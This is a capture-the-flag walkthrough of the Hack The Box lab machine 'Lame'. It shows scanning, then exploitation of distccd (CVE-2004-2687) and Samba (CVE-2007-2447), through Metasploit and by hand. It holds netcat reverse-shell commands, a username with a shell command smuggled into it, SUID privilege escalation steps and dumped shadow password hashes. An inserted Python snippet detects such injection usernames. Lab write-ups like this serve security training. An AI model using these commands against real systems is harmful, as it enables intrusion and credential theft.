HTB-Lame

Box Info

Difficulty Easy
OS Linux
IP Address 10.10.10.3

Port Scanning

# Check all open TCP
sudo rustscan 10.10.10.3 -r 1-65535 --ulimit 5000
# Nmap scan with script on open TCP port
sudo nmap 10.10.10.3 -sCV -Pn -sT -p 21,22,139,445,3632
# Nmap scan vulnerability
sudo nmap -sT -p 21,22,139,445,3632 --script=vuln -O -Pn 10.10.10.3
# Nmap scan with UDP port
sudo nmap -sU --top-ports 20 -Pn 10.10.10.3

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.12
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
| distcc-cve2004-2687:
| VULNERABLE:
| distcc Daemon Command Execution
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2004-2687
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Allows executing of arbitrary commands on systems running distccd 3.1 and
| earlier. The vulnerability is the consequence of weak service configuration.
|
| Disclosure date: 2002-02-01
| Extra information:
|
| uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
| https://distcc.github.io/security.html
|_ https://nvd.nist.gov/vuln/detail/CVE-2004-2687
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2025-06-01T08:33:23-04:00
|_clock-skew: mean: -5h39m46s, deviation: 2h49m45s, median: -7h39m48s
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)

Update DNS

sudo nano /etc/hosts
10.10.10.3 lame.htb

Service Enumeration

445/tcp - SMB

# NMAP Scanning
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)

From the nmap scan we can see that Samba is running version 3.0.20. Searching searchsploit for this version turns up a vulnerability.


It corresponds to CVE-2007-2447.


Check whether the SMB shares can be listed anonymously.

smbclient --no-pass -L //10.10.10.3/ 


3632/tcp - DistCC

The nmap vulnerability scan reports that the distccd service on this port is vulnerable.


distcc is designed to distribute compilation tasks across multiple machines to speed up the build process. However, if the distccd daemon is not properly secured, it exposes a remote code execution (RCE) vulnerability. This occurs because the daemon listens on a network port and accepts commands from any client, allowing them to execute shell commands on the server as the user running the daemon.

The vulnerability has been assigned CVE-2004-2687 and affects distccd versions prior to 3.1.

#1 Initiate User Foothold with DistCC Vulnerability

CVE-2004-2687

https://github.com/n3rdh4x0r/distccd_rce_CVE-2004-2687

Here we use the script from GitHub to obtain remote code execution.

git clone https://github.com/n3rdh4x0r/distccd_rce_CVE-2004-2687
cd distccd_rce_CVE-2004-2687

# Prep python venv
python3 -m venv venv
source venv/bin/activate

# Start listener on KALI
rlwrap nc -lvnp 9001

Exploit

python3 distccd_rce.py -t 10.10.10.3 -p 3632 -c "nc 10.10.xx.xx 9001 -e /bin/sh"


Upgrade to a fully interactive TTY

python -c 'import pty;pty.spawn("/bin/sh")'

User Flag


Privilege Escalation

SUID

find / -type f -user root \( -perm -4000 -o -perm -2000 \) 2>/dev/null -ls

Found that nmap has the SUID bit set.


Initiate Root Foothold

GTFObins

nmap | GTFOBins: https://gtfobins.github.io/gtfobins/nmap/


Found that the second one works.


Root Flag


#2 Initiate User Foothold with SMB Vulnerability

CVE-2007-2447 (Metasploit)

As we saw, the SMB service is vulnerable to CVE-2007-2447. We can use Metasploit to automate the exploit as below.

use exploit/multi/samba/usermap_script
set LHOST <kali-ip>
set LPORT 9001
set RHOST 10.10.10.3
set RPORT 139
exploit


Wait for the session to open; here we got the root user!


CVE-2007-2447 (Manually)

Here I would like to do it manually to gain a better understanding.


The Metasploit module is just a short script; its exploit method does the work.

It starts an smbclient session with:

  • username: /=`nohup [payload]`
  • password: a random 16-character string
  • domain: taken from SMBDomain

Basically, the Samba vulnerability executes shell commands embedded in the username, and the script wraps the payload in nohup so the process keeps running in the background. With the exploitation understood, let's work on the PoC.

# Start Listener
rlwrap nc -lvnp 9001

# Exploit with smbclient
smbclient //10.10.10.3/opt -U './=`nohup nc -e /bin/sh 10.10.14.12 9001`'

However, it shows the error NT_STATUS_LOGON_FAILURE.


An alternative method is to open an SMB session first and then issue the logon command.

smbclient --no-pass //10.10.10.3/tmp
logon "./=`nohup nc -e /bin/sh 10.10.14.12 9001`"
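As an added defender-side example (not part of the original writeup), the following Python flags SMB usernames that carry shell metacharacters, which is the shape of input CVE-2007-2447 abuses through Samba's "username map script" option. The log line format is a constructed sample, not real Samba output.

```python
import re

# Shell metacharacters that have no place in a legitimate SMB username.
# CVE-2007-2447 hands unfiltered usernames to a shell via Samba's
# 'username map script' option, so backticks, $(...), ';', '|', '&',
# redirections and newlines inside a username are a strong signal.
# A lone trailing '$' is deliberately not matched: machine accounts
# (e.g. LAME$) legitimately end with it.
SHELL_META = re.compile(r"[`;|&<>\n]|\$\(")

def is_injection_username(username: str) -> bool:
    """Return True if the username carries shell metacharacters."""
    return SHELL_META.search(username) is not None

# Constructed sample log lines (hypothetical format, not real Samba logs).
SAMPLE_LOG = """\
2025-06-01 08:31:02 client=10.10.14.12 user=makis result=OK
2025-06-01 08:33:10 client=10.10.14.12 user=./=`nohup nc -e /bin/sh 10.10.14.12 9001` result=FAIL
2025-06-01 08:34:55 client=10.10.14.12 user=LAME$ result=OK
"""

LOG_RE = re.compile(
    r"^(?P<ts>\S+ \S+) client=(?P<client>\S+) user=(?P<user>.*) result=(?P<res>\S+)$"
)

def find_suspicious(log_text: str) -> list:
    """Return (timestamp, client, username) for every line whose username
    looks like a shell-injection attempt. The logon result is ignored on
    purpose: the attempt is worth alerting on whether or not it succeeded."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and is_injection_username(m["user"]):
            hits.append((m["ts"], m["client"], m["user"]))
    return hits

if __name__ == "__main__":
    for ts, client, user in find_suspicious(SAMPLE_LOG):
        print(f"{ts} suspicious username from {client}: {user!r}")
```

On a real deployment the same check belongs in whatever pipeline ingests Samba authentication logs; the regex is the reusable part, the log parser is only a stand-in.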


User flag

I had already completed the user flag in #1 Initiate User Foothold with DistCC Vulnerability.

Since we have obtained the root user, we can check the user.txt file as well.

Root flag


Shadow hash

root:$1$p/d3CvVJ$4HDjev4SJFo7VMwL2Zg6P0:17239:0:99999:7:::
sys:$1$NsRwcGHl$euHtoVjd59CxMcIasiTw/.:17239:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
postgres:$1$dwLrUikz$LRJRShCPfPyYb3r6pinyM.:17239:0:99999:7:::
service:$1$cwdqim5m$bw71JTFHNWLjDTmYTNN9j/:17239:0:99999:7:::
makis:$1$Yp7BAV10$7yHWur1KMMwK5b8KRZ2yK.:17239:0:99999:7:::
